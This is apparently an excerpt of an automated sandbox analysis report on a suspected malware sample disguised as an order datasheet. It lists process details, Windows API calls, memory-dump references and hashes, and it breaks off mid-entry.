Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:02:26
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:02:34
Start date:	29/06/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0x70000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:02:34
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.3%
Total number of Nodes:	930
Total number of Limit Nodes:	24

Executed Functions

Function 00007FF7BD602B90 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602B9F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602BDD
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602C09
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602C1A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602C29
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602CC0
GetProcessAffinityMask.KERNEL32 ref: 00007FF7BD602CD3

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: 4c9e7b62ca1d93063124db9da2326d3f3828c88f021132ba50495a9616bc8b52
Instruction ID: c7a6047e8abbef0b77c939b4562fc0f3ad269a25284dd422ff56f80bcee4236d
Opcode Fuzzy Hash: 4c9e7b62ca1d93063124db9da2326d3f3828c88f021132ba50495a9616bc8b52
Instruction Fuzzy Hash: 81518031E1C74686EB59AF1DA4402A9A3A2FF6A784FC40031EB4D87369FF6DE444C760

Function 00007FF7BD5F8130 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7BD5FD0F0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BD5F813F,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD5FD0FB
Part of subcall function 00007FF7BD5FD0F0: QueryInformationJobObject.KERNEL32 ref: 00007FF7BD5FD1CE

Part of subcall function 00007FF7BD5FCE80: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF7BD5F8168,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD5FCE91

RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7BD5F81C9
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD5F82B3

Strings

TotalStressLogSize, xrefs: 00007FF7BD5F81EA
StressLogLevel, xrefs: 00007FF7BD5F8225
The required instruction sets are not supported by the current CPU., xrefs: 00007FF7BD5F829F

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
API String ID: 2052584837-2841289747
Opcode ID: d0ac9821fb6c0add4b9ebbe98daa48ccbd8c985c351c2d863065a78766f66ba6
Instruction ID: e927d0dbcb1336dd999a91235a9f6c6a0a0057e50fff0bcf862b0540661345eb
Opcode Fuzzy Hash: d0ac9821fb6c0add4b9ebbe98daa48ccbd8c985c351c2d863065a78766f66ba6
Instruction Fuzzy Hash: 55415E61E0CA4281E60DBB29A9016F9E791AF63794FC84131EF4D1B69EEF6CF445C720

Function 00007FF7BD65BDA4 Relevance: 3.2, APIs: 2, Instructions: 199
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7BD65B4B9,?,?,?,?,00007FF7BD5FE7A1,?,?,?,00007FF7BD5FED24,00000000,00000020,?), ref: 00007FF7BD65BDBE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BD65BDD4

Part of subcall function 00007FF7BD65C204: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BD65C20D

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: bf961b2ab8b72b6bb4696f625dc9e1acb4f646454a2333270e2ccd61e10cc9a7
Instruction ID: b61264fa17aadb5be53f88e4c0f6c5cab830b031ec92d1d90f2747a831c15771
Opcode Fuzzy Hash: bf961b2ab8b72b6bb4696f625dc9e1acb4f646454a2333270e2ccd61e10cc9a7
Instruction Fuzzy Hash: A0819471D0D6064AF71CAF2DA451368B6E1AB263BCF844739EA2D477D8EF7D50908720

Function 00007FF7BD6C0D30 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,00000010,000001E8518002C0,?,?,00000000,?,?,00007FF7BD68E953), ref: 00007FF7BD6C0D86

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 204640446f1087154f6338ca72d232791813a4a0625229ff24d57606c327cb8e
Instruction ID: 6b58970d01050ff324445148a1aa454a2d497210b99bde367447178ce0144dbd
Opcode Fuzzy Hash: 204640446f1087154f6338ca72d232791813a4a0625229ff24d57606c327cb8e
Instruction Fuzzy Hash: E001D733F0871499EB15DAB5AC014ED76B4BB5535CB90013AEE4DA7A48EF34A456C640

Function 00007FF7BD6238B0 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: ddf024b420cd03df19e8db7deeecce530399b47b3ff7054261004166c7f10102
Instruction ID: c8d98f89915616916cffc654b851a04fd03f1e853dc3f94fed701738d1195261
Opcode Fuzzy Hash: ddf024b420cd03df19e8db7deeecce530399b47b3ff7054261004166c7f10102
Instruction Fuzzy Hash: FB02E660E0CA4645F61DAB1DA440234F6A3AF777A6F84463AE70D17368FFBCB4618721

Function 00007FF7BD6221B0 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413a631292c9d3b437e1fcde30ddbf08a87a6fa19b6ce85af6a8aa1f10ad9b61
Instruction ID: e035653052d9af51befcc518637110e5ddf728dcdc5d854044e5c3195338ab5f
Opcode Fuzzy Hash: 413a631292c9d3b437e1fcde30ddbf08a87a6fa19b6ce85af6a8aa1f10ad9b61
Instruction Fuzzy Hash: 38F17221D1DB4245F60EFB2C9951275E252AFBB395FC48335F60D1236AFFACB4A08220

Function 00007FF7BD602750 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7BD60278C
IsProcessInJob.KERNEL32 ref: 00007FF7BD60279C
QueryInformationJobObject.KERNEL32 ref: 00007FF7BD6027CC
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7BD60283E
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7BD602879
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7BD6028C0

Strings

@, xrefs: 00007FF7BD60286E
@, xrefs: 00007FF7BD6028B5
@, xrefs: 00007FF7BD602826

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: 46198da623394d7b15bb719f5e4a5128e58e6380a5aeb4f160e59a8db540b038
Instruction ID: eaef72fbb8a73914f2626872e6cb9a37f347f1b9da71a1506b1a5c54e47828a6
Opcode Fuzzy Hash: 46198da623394d7b15bb719f5e4a5128e58e6380a5aeb4f160e59a8db540b038
Instruction Fuzzy Hash: 59416136A0CA8185EB759F15E4443A9B361FB99BA4F884235DBAD42ADCEF3CD4488710

Function 00007FF7BD5FD0F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BD5F813F,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD5FD0FB

Part of subcall function 00007FF7BD602B90: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602B9F
Part of subcall function 00007FF7BD602B90: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602BDD
Part of subcall function 00007FF7BD602B90: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602C09
Part of subcall function 00007FF7BD602B90: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602C1A
Part of subcall function 00007FF7BD602B90: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7BD5FD11A), ref: 00007FF7BD602C29

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BD5F813F,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD5FD16D
GetProcessAffinityMask.KERNEL32 ref: 00007FF7BD5FD180
QueryInformationJobObject.KERNEL32 ref: 00007FF7BD5FD1CE

Strings

PROCESSOR_COUNT, xrefs: 00007FF7BD5FD136

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
String ID: PROCESSOR_COUNT
API String ID: 1701933505-4048346908
Opcode ID: 25420fbf59497c97a6a616538860f2c47e8523c816d87657a417c9793d34a5e2
Instruction ID: 2fe8de3ee54ca43ae5d249f1d1c9df334d900c197d0efd0813feb653db3f2ebf
Opcode Fuzzy Hash: 25420fbf59497c97a6a616538860f2c47e8523c816d87657a417c9793d34a5e2
Instruction Fuzzy Hash: BA318961A0C68285EB1CBB59E4803F9E351EF66794FC40032DB4D47699FF2DE4498760

Function 00007FF7BD5F3630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF7BD6BF880), ref: 00007FF7BD5F36D5
RaiseFailFastException.KERNEL32(?,?,?,00007FF7BD6BF880), ref: 00007FF7BD5F3701
RaiseFailFastException.KERNEL32(?,?,?,00007FF7BD6BF880), ref: 00007FF7BD5F373A

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF7BD5F3726

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 6d8d11b0511a8dae8a9ce044f43be3adb427a5065ca878d9ad955d00c565f2fa
Instruction ID: 0339dd7315327bbc72b1006239b02bfb38cce24ac690656f62b40e7629e8bb94
Opcode Fuzzy Hash: 6d8d11b0511a8dae8a9ce044f43be3adb427a5065ca878d9ad955d00c565f2fa
Instruction Fuzzy Hash: 9C416F71A0DA4282FB98AB1DE5403F9B3A0EF26794F844139DB4D4B398EF7DE454C260

Function 00007FF7BD5FD350 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF7BD5FD371
SetThreadPriority.KERNELBASE ref: 00007FF7BD5FD38D
ResumeThread.KERNELBASE ref: 00007FF7BD5FD396
FindCloseChangeNotification.KERNELBASE ref: 00007FF7BD5FD39F

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
String ID:
API String ID: 2150560229-0
Opcode ID: 1fd97627cfe8389e38b2286a366fd33d3ebac3e1f7f8eb4fcf4620db7d9795ed
Instruction ID: 1e08354dce1122287785b8d01d1153b3296ea42e7e80785ef3ca5fabce8c487e
Opcode Fuzzy Hash: 1fd97627cfe8389e38b2286a366fd33d3ebac3e1f7f8eb4fcf4620db7d9795ed
Instruction Fuzzy Hash: 20E0E5A5E2C70242EB0CAF66B8183B99350BFADB85F880034CF0E06394FF3D91454610

Function 00007FF7BD602570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7BD6025A7
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7BD60266C

Strings

@, xrefs: 00007FF7BD602664

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: d415d27f6ddf2cca45eba18734769ddeecb613225847b9f00db101291d5e82da
Instruction ID: e90c39bf680c9deefd1ab0a31f8e253a21a8f338a13cef5cc167c62e744258c0
Opcode Fuzzy Hash: d415d27f6ddf2cca45eba18734769ddeecb613225847b9f00db101291d5e82da
Instruction Fuzzy Hash: 8D41F361E5DB4642E95F9A3A9150339D2936F6FBC8F58C631DB0E62748FF3CE4818620

Function 00007FF7BD608DCB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF7BD608E2E
GetTickCount64.KERNEL32 ref: 00007FF7BD608EB3

Strings

D), xrefs: 00007FF7BD608F57

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Count64Tick
String ID: D)
API String ID: 1927824332-848725745
Opcode ID: 0377081e61abf4bdbb59f6ee3647f0da22498c35c4941a118b0e91adc27288dc
Instruction ID: 4dc0dd75fc80f8b72eeeb33f93f9b3977a4c41d4929ff2c3a169bb2f6d65f9ca
Opcode Fuzzy Hash: 0377081e61abf4bdbb59f6ee3647f0da22498c35c4941a118b0e91adc27288dc
Instruction Fuzzy Hash: C5415F21E0C74685EA6DFB2DE480279A352AB727E9F844536DB0D033A9FE6CF5448260

Function 00007FF7BD602E10 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7BD606968,?,?,0000000B,00007FF7BD605830,?,?,00000000,00007FF7BD5FFBF1), ref: 00007FF7BD602E37
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7BD606968,?,?,0000000B,00007FF7BD605830,?,?,00000000,00007FF7BD5FFBF1), ref: 00007FF7BD602E57
VirtualAllocExNuma.KERNEL32 ref: 00007FF7BD602E78

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: 5188d5bc0a99c14dc0d2229a5aba8e7e5169a6da6aec5c86698c49050b78a37c
Instruction ID: 87ebf64cdd7285c9dffb2fddd307b3dd94135dc7631a70afaff2a1df744134e2
